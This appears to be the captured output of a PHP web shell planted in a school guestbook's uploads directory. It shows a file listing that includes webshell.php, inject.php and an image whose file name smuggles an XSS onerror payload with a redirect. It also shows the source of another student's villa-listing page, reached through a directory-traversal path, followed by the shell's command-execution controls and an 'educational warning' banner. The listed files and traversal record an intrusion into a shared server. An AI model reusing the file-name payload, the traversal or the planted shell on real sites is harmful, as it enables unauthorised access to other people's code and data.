📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../586648.klas4s23.mid-ica.nl/public_html/VillaVerkenner/VillaInfo.php

<?php include 'includes/header.php'; include 'includes/databaseConn.php'; $db = new Database(); $conn = $db->getConnection(); $id = isset($_GET['id']) ? intval($_GET['id']) : 0; if ($id <= 0) { echo "<p style='text-align:center; margin-top:50px;'>Geen villa geselecteerd.</p>"; include 'includes/footer.php'; exit; } $stmt = $conn->prepare("SELECT * FROM villas WHERE villa_id = :id AND is_gepubliceerd = 1 LIMIT 1"); $stmt->bindParam(':id', $id, PDO::PARAM_INT); $stmt->execute(); $villa = $stmt->fetch(PDO::FETCH_ASSOC); // Fetch eigenschappen $stmt = $conn->prepare(" SELECT e.naam FROM eigenschappen e INNER JOIN villa_eigenschappen ve ON e.eigenschap_id = ve.eigenschap_id WHERE ve.villa_id = :id "); $stmt->bindParam(':id', $id, PDO::PARAM_INT); $stmt->execute(); $eigenschappen = $stmt->fetchAll(PDO::FETCH_COLUMN); // Fetch ligging tags (column is 'naam', not 'tag_naam') $stmt = $conn->prepare(" SELECT lt.naam FROM ligging_tags lt INNER JOIN villa_ligging_tags vlt ON lt.tag_id = vlt.tag_id WHERE vlt.villa_id = :id "); $stmt->bindParam(':id', $id, PDO::PARAM_INT); $stmt->execute(); $liggingTags = $stmt->fetchAll(PDO::FETCH_COLUMN); // Fetch hoofdafbeelding (main photo) $stmt = $conn->prepare("SELECT bestandspad FROM fotos WHERE villa_id = :id AND is_hoofdfoto = 1 LIMIT 1"); $stmt->bindParam(':id', $id, PDO::PARAM_INT); $stmt->execute(); $fotoHoofd = $stmt->fetch(PDO::FETCH_ASSOC); // Fetch overige foto's (other photos) $stmt = $conn->prepare("SELECT bestandspad FROM fotos WHERE villa_id = :id AND is_hoofdfoto = 0 LIMIT 4"); $stmt->bindParam(':id', $id, PDO::PARAM_INT); $stmt->execute(); $fotoOverig = $stmt->fetchAll(PDO::FETCH_ASSOC); // Prepare image list $images = []; if (!empty($fotoHoofd['bestandspad'])) { // Ensure path starts with / $path = $fotoHoofd['bestandspad']; if (strpos($path, '') !== 0) { $path = '' . $path; } $images[] = $path; } else { $images[] = 'images/villa.png'; } if (!empty($fotoOverig)) { foreach ($fotoOverig as $foto) { if (!empty($foto['bestandspad'])) { // Ensure path starts with / $path = $foto['bestandspad']; if (strpos($path, '') !== 0) { $path = '' . $path; } $images[] = $path; } } } // Fill remaining gallery slots with placeholders if less than 5 images while (count($images) < 5) { $images[] = 'images/interieur.png'; } ?> <!DOCTYPE html> <html lang="nl"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title><?php echo htmlspecialchars($villa['titel']); ?> - Villa Verkenner</title> <link rel="stylesheet" href="css/style.css"> <style> .villa-container { max-width: 1200px; margin: 40px auto; background: #fff; box-shadow: 0 0 12px rgba(0, 0, 0, 0.1); border-radius: 12px; overflow: hidden; } .villa-images { display: grid; grid-template-columns: 2fr 1fr; gap: 10px; } .villa-images img { width: 100%; height: 100%; object-fit: cover; border-radius: 8px; } .villa-gallery { display: grid; grid-template-columns: repeat(2, 1fr); gap: 10px; } .villa-gallery img { width: 100%; height: 100%; object-fit: cover; border-radius: 8px; } .villa-content { padding: 20px; color: black; display: flex; flex-direction: row; } .villa-description { margin-bottom: 25px; line-height: 1.6; } .villa-info { flex-direction: column; width: 65%; background-color: #C8D9E8; border-radius: 20px; padding: 20px; } .villa-details { background: #C8D9E8; color: black; padding: 15px 20px; border-radius: 20px; width: 30%; margin-left: auto; } .villa-details ul { list-style: none; padding: 0; } .villa-details li { padding: 6px 0; border-bottom: 1px solid #e1e1e1; } .villa-details li:last-child { border-bottom: none; } .btn { display: inline-block; color: #fff; text-decoration: none; padding: 10px 18px; border-radius: 6px; margin-top: 20px; transition: background 0.3s; } .back-btn { background-color: #0072c6; } .back-btn:hover { background-color: #005b9a; } .pdf-btn { background-color: #00b67a; } .pdf-btn:hover { background-color: #009a64; } @media (max-width: 768px) { .villa-images { grid-template-columns: 1fr; } .villa-gallery { grid-template-columns: repeat(2, 1fr); } .villa-container { margin: 20px; } } @media (max-width: 480px) { .villa-content { flex-direction: column; } .villa-info, .villa-details { width: 100%; margin: 0 0 20px 0; } } </style> </head> <body> <div class="villa-container"> <div class="villa-images"> <img src="<?php echo htmlspecialchars($images[0]); ?>" alt="Hoofdafbeelding van villa"> <div class="villa-gallery"> <img src="<?php echo htmlspecialchars($images[1]); ?>" alt="Villa foto"> <img src="<?php echo htmlspecialchars($images[2]); ?>" alt="Villa foto"> <img src="<?php echo htmlspecialchars($images[3]); ?>" alt="Villa foto"> <img src="<?php echo htmlspecialchars($images[4]); ?>" alt="Villa foto"> </div> </div> <div class="villa-content"> <div class="villa-info"> <h2><?php echo htmlspecialchars($villa['titel']); ?></h2> <p><em><?php echo htmlspecialchars($villa['plaats']); ?></em></p> <div class="villa-description"> <p><?php echo nl2br(htmlspecialchars($villa['omschrijving'])); ?></p> </div> </div> <div class="villa-details"> <ul> <li><strong>Adres:</strong> <?php echo htmlspecialchars($villa['adres']); ?></li> <li><strong>Plaats:</strong> <?php echo htmlspecialchars($villa['plaats']); ?></li> <li><strong>Capaciteit:</strong> <?php echo htmlspecialchars($villa['capaciteit']); ?> personen</li> <li><strong>Slaapkamers:</strong> <?php echo htmlspecialchars($villa['slaapkamers']); ?></li> <li><strong>Badkamers:</strong> <?php echo htmlspecialchars($villa['badkamers']); ?></li> <?php if (!empty($liggingTags)): ?> <li><strong>Ligging:</strong> <?php echo htmlspecialchars(implode(', ', $liggingTags)); ?></li> <?php endif; ?> <?php if (!empty($eigenschappen)): ?> <li><strong>Eigenschappen:</strong> <?php echo htmlspecialchars(implode(', ', $eigenschappen)); ?></li> <?php endif; ?> <li><strong>Prijs per nacht:</strong> €<?php echo number_format($villa['prijs_per_nacht'], 2, ',', '.'); ?></li> </ul> <a href="VillaPage.php" class="btn back-btn">← Terug naar overzicht</a> <a href="generateVillaPDF.php?id=<?php echo $villa['villa_id']; ?>" class="btn pdf-btn">📄 Download Flyer</a> </div> </div> </div> <?php include 'includes/footer.php'; ?> </body> </html>

🎯 Available Actions

⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!

🐚 WEB SHELL ACTIVATED

📁 File Browser

📄 Viewing: ./../../../../586648.klas4s23.mid-ica.nl/public_html/VillaVerkenner/VillaInfo.php

🎯 Available Actions

Command Execution:

Quick Commands:

File Operations: